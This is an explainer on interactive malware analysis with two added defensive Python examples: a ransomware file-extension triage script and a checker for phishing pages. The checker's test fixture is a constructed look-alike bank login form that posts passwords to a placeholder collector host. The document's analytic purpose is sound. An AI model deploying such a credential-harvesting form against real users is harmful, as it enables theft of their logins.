Malware analysis is the process of determining the origin, purpose, and functionality of malware samples, and is generally divided into static and dynamic analysis varieties. Interactive analysis is a manual form of dynamic analysis that allows security researchers and incident responders to interact with suspected malware samples or their environment in real-time, making changes or giving instructions and receiving immediate results.
Much in the same way that static and dynamic analysis are used to complement each other, interactive analysis is often paired with more automated dynamic analysis. Interactive analysis is often employed to fill gaps left by automated analysis, allowing human specialists to save time in an investigation or whenever human intervention is necessary to discover alternate execution scenarios that automation may miss.
Generally speaking, automated analysis is the preferred method for analyzing potential malware samples at scale. However, there are situations in which human intervention can be beneficial for a variety of reasons.
For instance, well-trained analysts can draw on their expertise to apply manual interactive analysis techniques when doing so saves time during the investigation of a particular malware sample. Specifically, a security analyst or incident responder who already knows a particular malware family may anticipate registry changes at designated paths, or files encrypted with a predictable extension. This approach can be useful for dealing with suspected ransomware, which tends to abandon any attempts at evasion once it begins encrypting files.
The infamous GandCrab ransomware, for instance, encrypted files with a .KRAB extension. Where automated methods need to complete a full analysis before security experts receive results, an expert analyst can manually identify these unusual files and take immediate action as soon as they're found.
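The file-system check an analyst performs in the scenario above can be scripted against a sandbox VM's mounted disk. The following is an added example, not code from the original page or from any analysis product it describes: it builds a constructed directory tree, counts files by extension, and flags files whose final extension matches a family the analyst is watching for (here only .KRAB, the GandCrab value named in the text; the file names and layout are invented sample data). It also recovers the original extension hiding under the appended one (report.docx.KRAB), which is the detail that tells an analyst a document was renamed rather than newly dropped.

```python
"""Triage helper: spot files carrying a ransomware family's predictable
extension, as an analyst would while watching a sandbox VM's file system.

Added example, not part of the original page. The only real-world value
here is the .KRAB extension named in the text; the directory layout and
file names below are constructed sample data.
"""
import os
import tempfile
from collections import Counter
from pathlib import Path

# Extensions an analyst expects from a family they have seen before.
# ".krab" comes from the page (GandCrab); matching is case-insensitive
# because not every family preserves the case it documents.
WATCHED_EXTENSIONS = {".krab"}


def build_sample_tree(root: Path) -> None:
    """Create a constructed tree mixing ordinary documents with files
    renamed the way GandCrab-style encryption would leave them."""
    (root / "Documents").mkdir(parents=True)
    (root / "Pictures").mkdir()
    (root / "Documents" / "budget.xlsx").write_bytes(b"PK\x03\x04 ordinary spreadsheet")
    (root / "Documents" / "notes.txt").write_text("plain notes")
    # Encrypted files keep their original name and gain the family's extension.
    (root / "Documents" / "report.docx.KRAB").write_bytes(os.urandom(64))
    (root / "Pictures" / "holiday.jpg.KRAB").write_bytes(os.urandom(64))
    (root / "Pictures" / "cat.png").write_bytes(b"\x89PNG fake image")


def extension_histogram(root: Path) -> Counter:
    """Count files under root by their final extension, lower-cased."""
    counts: Counter = Counter()
    for path in root.rglob("*"):
        if path.is_file():
            counts[path.suffix.lower()] += 1
    return counts


def find_encrypted_files(root: Path, watched=WATCHED_EXTENSIONS) -> list:
    """Return paths whose final extension is one the analyst is watching for."""
    return [
        path
        for path in sorted(root.rglob("*"))
        if path.is_file() and path.suffix.lower() in watched
    ]


def triage(root: Path) -> dict:
    """Summarise what a quick look at the tree tells the analyst:
    which files look encrypted, what they were before renaming, and the
    overall extension distribution for spotting anything else unusual."""
    hits = find_encrypted_files(root)
    return {
        "encrypted_files": [p.relative_to(root).as_posix() for p in hits],
        # Path("report.docx").suffix -> ".docx": the pre-encryption extension.
        "original_extensions": sorted({Path(p.stem).suffix.lower() for p in hits}),
        "histogram": extension_histogram(root),
    }


def run_demo() -> dict:
    """Build the constructed tree in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        sample_root = Path(tmp)
        build_sample_tree(sample_root)
        return triage(sample_root)


if __name__ == "__main__":
    result = run_demo()
    for name in result["encrypted_files"]:
        print("suspected encrypted file:", name)
    print("original extensions seen:", result["original_extensions"])
    print("files per extension:", dict(result["histogram"]))
```

In practice the watched set is whatever the analyst knows about the family in play, and the histogram is the part worth eyeballing when the family is unfamiliar: a single unknown extension appearing on many files at once is the same signal without a prior name for it.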
In a second scenario, interactive analysis may not just save time; it may be required to fully probe a sample and determine its true intent. This can be the case when investigating potentially malicious URLs used in targeted spear-phishing attacks, which are commonly leveled against individual high-level executives or other members of an organization with privileged access to information. Analysts can investigate these URLs within a secure environment and may find that they lead to phishing pages that mimic the look of commonly used websites where sensitive information is entered, such as bank login pages.
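Once the analyst has captured the page that a suspect URL serves inside the isolated environment, one quick static check is whether the page's credential form actually submits to the site it pretends to be. The following is an added example, not code from the original page: the page URL and the HTML are constructed sample data using reserved placeholder domains (.invalid and .example), and the heuristic (a password field whose form posts to a different host than the page, or over plain http) is a common analyst check rather than anything the page itself describes.

```python
"""Static triage of captured phishing-page HTML: find credential forms that
submit somewhere other than the host serving the page.

Added example, not from the original page. PAGE_URL and CAPTURED_HTML are
constructed sample data (reserved .invalid / .example names) standing in
for what an analyst captures while visiting a suspect link in an isolated VM.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed: a look-alike login page and the HTML it served.
PAGE_URL = "http://secure-login.bank-lookalike.invalid/account/signin"

CAPTURED_HTML = """
<html><head><title>Example Bank - Sign in</title></head>
<body>
<form id="login" method="post" action="https://collector.example/submit.php">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
<form id="search" method="get" action="/search">
  <input type="text" name="q">
</form>
</body></html>
"""


class FormCollector(HTMLParser):
    """Record each <form>'s id and action and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {
                "id": attrs.get("id", ""),
                "action": attrs.get("action", ""),
                "has_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyse_page(page_url: str, html: str) -> list:
    """Return one finding per form that collects a password and sends it to a
    host other than the page's own, or over plain http. Forms without a
    password field (the search form above) are ignored."""
    parser = FormCollector()
    parser.feed(html)
    page_host = urlsplit(page_url).hostname
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # Resolve relative actions against the page URL; an empty action
        # submits back to the page itself.
        target = urljoin(page_url, form["action"] or page_url)
        parts = urlsplit(target)
        reasons = []
        if parts.hostname != page_host:
            reasons.append(f"credentials posted to different host {parts.hostname}")
        if parts.scheme != "https":
            reasons.append("credentials sent over plain http")
        if reasons:
            findings.append({"form": form["id"], "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyse_page(PAGE_URL, CAPTURED_HTML):
        print(f"form '{finding['form']}' -> {finding['target']}: {'; '.join(finding['reasons'])}")
```

A hit from this check is a prompt for the analyst, not a verdict: legitimate sites do occasionally post logins to a separate authentication host, so the finding is combined with what the page looks like, what brand it imitates, and where the URL came from, which is exactly the judgement the interactive session exists to supply.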